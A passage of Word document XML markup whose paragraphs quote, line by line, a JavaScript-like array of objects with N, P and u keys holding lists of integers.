    <w:p w14:paraId="7E6B5CC6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [10],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77D31D73" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 9, 10, 11, 12, 13, 14, 15, 16, 17, 18, 19],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791DB8FD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2, 3, 4, 5, 6, 7, 8, 178, 249, 282, 288, 306, 344]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044EB7A0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE73663" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731E55D2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF3BAB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [83, 184, 199, 302, 347]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4230FBFE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C401643" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A3041E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E1F5CD" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="189F798A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39066239" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F2FC4C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C5D669" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BF5C14" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="003C2E41" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         X: 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FC735ED" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="386C956C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38AD2DAC" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [109]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66BDE65D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3B778C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A65EFB4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A9AEEB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FA8681A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AAE9B83" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1790EA5A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D7B389E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [3, 49, 121]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B37C888" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56150004" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAE87F8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 3],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08A3323A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 35]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77CA9BBB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32C54BC5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F8A1B4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E6047C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EADE7B9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="409F5C8E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CAE7DD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D1E7B2C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [15]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65680732" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62E8FC8D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2DA2F0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D09260" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [10]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408C47C3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60A9EA57" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718FF806" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B2AF804" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A79726A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202738DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBCF636" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3E487D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [2]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F6FB934" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C20D8E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="732E0E06" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48DD02E7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [57, 106, 189, 344, 354]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C5222C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BCCC0C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FECCEEF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ACB9A37" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE7FF55" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723B2110" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61706410" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBBA064" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 2, 3, 5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C04E95B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73791768" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [5, 3, 4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0783D856" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="680F0FEA" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24E27873" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F339198" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18654871" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0098D0D3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 13]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018FE3DB" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0824FAB1" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [6, 0, 2, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB204C6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7, 8],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016DC811" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [269, 324]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BA0EE05" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D8185A" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="582AEE50" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0205670E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [5]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="244F3E75" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F1BD518" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CAA1E2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DB11C5E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E99FDA3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74A45EF5" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         N: [1, 7, 5, 2, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DBC9DF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5, 6, 7],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADC6D5D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [352]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255C8492" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69568B36" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38277CF8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF21494" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0C4D7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="120527C0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [4],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AD2AFD6" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 2, 4, 5, 6],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB0A2B3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [1, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="265E6D8B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F9D3009" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C488823" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2, 3, 4, 5],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="259B6967" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 13, 90, 159, 317]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56276138" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC98227" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3092DFB8" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D9D6F9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 114]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCF7E5F" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12300663" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5771D1D0" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448B0E33" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 6, 17, 19]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25AC9B1D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69C7602E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20C1AAD7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C3C3AF" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>&gt;&gt;         u: [196]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3136F8A7" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24EDDD9C" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545B7353" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53642632" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="441A2D59" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4A795D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="331EA9F2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A6A757E" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [7, 10, 16, 18, 178, 288]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="212A2EAE" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4D7CC2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [1, 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39B81D7B" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [0, 1, 2],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674FCCF3" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [210, 305]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B767B3D" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B62C1C2" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         N: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AFE6D9" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         P: [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0537F597" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;         u: [0, 3]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED564C4" w14:textId="77777777" w:rsidR="00232109" w:rsidRDefault="00232109" w:rsidP="00232109">
      <w:r>
        <w:t>&gt;&gt;     }, {</w:t>
      </w:r>
    </w:p>
